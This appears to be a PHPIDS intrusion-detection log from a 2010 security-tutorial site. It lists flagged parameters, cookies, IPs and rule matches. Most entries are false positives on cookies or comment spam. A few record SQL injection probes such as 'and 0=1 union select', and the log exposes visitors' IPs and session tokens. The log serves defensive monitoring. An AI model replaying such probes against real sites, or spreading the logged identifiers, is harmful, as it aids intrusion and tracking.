| ID: | 122964 | | Name: | GET.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.28 | | Impact: | 12 | | Created: | 2010-04-29 11:51:39 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 122961 | | Name: | REQUEST.bcsi-ac-3CDF84328BD51AF7 | | Value: | 1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA= | | Page: | /?bcsi-ac-3CDF84328BD51AF7=1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA= | | IP: | 174.36.36.38 | | Impact: | 14 | | Created: | 2010-04-29 10:53:54 | | Details: | Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.5172413793103
|
| ID: | 122962 | | Name: | GET.bcsi-ac-3CDF84328BD51AF7 | | Value: | 1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA= | | Page: | /?bcsi-ac-3CDF84328BD51AF7=1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA= | | IP: | 174.36.36.38 | | Impact: | 14 | | Created: | 2010-04-29 10:53:54 | | Details: | Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.5172413793103
|
| ID: | 122959 | | Name: | REQUEST.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-29 10:53:46 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 122960 | | Name: | COOKIE.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-29 10:53:46 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 122957 | | Name: | REQUEST.codeme | | Value: | really great sites, thank you, <a href= http://chanelsunglasses.imagekind.com/#1 >chanel sunglasses</a> [url=http://chanelsunglasses.imagekind.com/#1]chanel sunglasses[/url], 76313, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 10:39:54 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122958 | | Name: | POST.codeme | | Value: | really great sites, thank you, <a href= http://chanelsunglasses.imagekind.com/#1 >chanel sunglasses</a> [url=http://chanelsunglasses.imagekind.com/#1]chanel sunglasses[/url], 76313, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 10:39:54 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122955 | | Name: | REQUEST.codeme | | Value: | can you do thi for me, <a href= http://exoticgstringbikini.imagekind.com/ >exotic g string bikini online</a>, [url= http://exoticgstringbikini.imagekind.com/ ]exotic g string bikini online[/url], sjyob, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 08:59:48 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122956 | | Name: | POST.codeme | | Value: | can you do thi for me, <a href= http://exoticgstringbikini.imagekind.com/ >exotic g string bikini online</a>, [url= http://exoticgstringbikini.imagekind.com/ ]exotic g string bikini online[/url], sjyob, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 08:59:48 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122953 | | Name: | REQUEST.page | | Value: | security/networkprinterhacking>Hacking network printers</a>
by northpole<br>
<a href= | | Page: | /i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href= | | IP: | 66.249.67.227 | | Impact: | 8 | | Created: | 2010-04-29 08:48:52 | | Details: | <a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122954 | | Name: | GET.page | | Value: | security/networkprinterhacking>Hacking network printers</a>
by northpole<br>
<a href= | | Page: | /i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href= | | IP: | 66.249.67.227 | | Impact: | 8 | | Created: | 2010-04-29 08:48:52 | | Details: | <a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122951 | | Name: | REQUEST.codeme | | Value: | Nise site, <a href= http://tinystringbikini.imagekind.com/#1 >tiny string bikini online</a> [url=http://tinystringbikini.imagekind.com/#1]tiny string bikini online[/url], 958388, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 08:09:23 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122952 | | Name: | POST.codeme | | Value: | Nise site, <a href= http://tinystringbikini.imagekind.com/#1 >tiny string bikini online</a> [url=http://tinystringbikini.imagekind.com/#1]tiny string bikini online[/url], 958388, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 08:09:23 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122949 | | Name: | REQUEST.codeme | | Value: | Very interesting sites., <a href= http://skimpygstringbikini.imagekind.com/#1 >skimpy g string bikini information</a> [url=http://skimpygstringbikini.imagekind.com/#1]skimpy g string bikini information[/url], 7144, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 07:19:22 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122950 | | Name: | POST.codeme | | Value: | Very interesting sites., <a href= http://skimpygstringbikini.imagekind.com/#1 >skimpy g string bikini information</a> [url=http://skimpygstringbikini.imagekind.com/#1]skimpy g string bikini information[/url], 7144, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 07:19:22 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122947 | | Name: | REQUEST.codeme | | Value: | best for you, <a href= http://microbikinigallery.imagekind.com/#1 >micro bikini gallery</a> [url=http://microbikinigallery.imagekind.com/#1]micro bikini gallery[/url], vgg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 05:39:35 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122948 | | Name: | POST.codeme | | Value: | best for you, <a href= http://microbikinigallery.imagekind.com/#1 >micro bikini gallery</a> [url=http://microbikinigallery.imagekind.com/#1]micro bikini gallery[/url], vgg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 05:39:35 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122945 | | Name: | REQUEST.page | | Value: | security/networkprinterhacking and 0=1 union select | | Page: | /i.php?page=security/networkprinterhacking+and+0=1+union+select+ | | IP: | 123.19.106.204 | | Impact: | 20 | | Created: | 2010-04-29 05:19:09 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122946 | | Name: | GET.page | | Value: | security/networkprinterhacking and 0=1 union select | | Page: | /i.php?page=security/networkprinterhacking+and+0=1+union+select+ | | IP: | 123.19.106.204 | | Impact: | 20 | | Created: | 2010-04-29 05:19:09 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122941 | | Name: | REQUEST.PREF | | Value: | ID=396d96915dd4e86c:TM=1272539065:LM=1272539065:S=_LBRxQE7X18p3Yll | | Page: | /i.php?page=videos/recovercookies | | IP: | 128.59.20.227 | | Impact: | 30 | | Created: | 2010-04-29 04:02:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 122942 | | Name: | REQUEST.domain | | Value: | .google.com, NID=34=OOUWRABRmGNl6m4Za1hxsYkpIPP7hqysIFRvkisPZBZP4NIJz5olzgXoqsokNdKFOr-Zj4uKbamEYdhKlRzI6Nl5kZD5jDFz6DtFRF7-17BdFM97Yxgx77U8WckePxFG | | Page: | /i.php?page=videos/recovercookies | | IP: | 128.59.20.227 | | Impact: | 30 | | Created: | 2010-04-29 04:02:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122943 | | Name: | COOKIE.PREF | | Value: | ID=396d96915dd4e86c:TM=1272539065:LM=1272539065:S=_LBRxQE7X18p3Yll | | Page: | /i.php?page=videos/recovercookies | | IP: | 128.59.20.227 | | Impact: | 30 | | Created: | 2010-04-29 04:02:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 122944 | | Name: | COOKIE.domain | | Value: | .google.com, NID=34=OOUWRABRmGNl6m4Za1hxsYkpIPP7hqysIFRvkisPZBZP4NIJz5olzgXoqsokNdKFOr-Zj4uKbamEYdhKlRzI6Nl5kZD5jDFz6DtFRF7-17BdFM97Yxgx77U8WckePxFG | | Page: | /i.php?page=videos/recovercookies | | IP: | 128.59.20.227 | | Impact: | 30 | | Created: | 2010-04-29 04:02:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122935 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122936 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122937 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122938 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122939 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122940 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/windows-forensics-registry-and-file-system-spots | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:54:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122929 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122930 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122931 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122932 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122933 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122934 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:58 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122923 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122924 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122925 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122926 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122927 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122928 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/louisville-metasploit-class | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122917 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122918 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122919 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122920 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122921 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122922 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/when-web-2-attacks-rafal-los | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122911 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122912 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
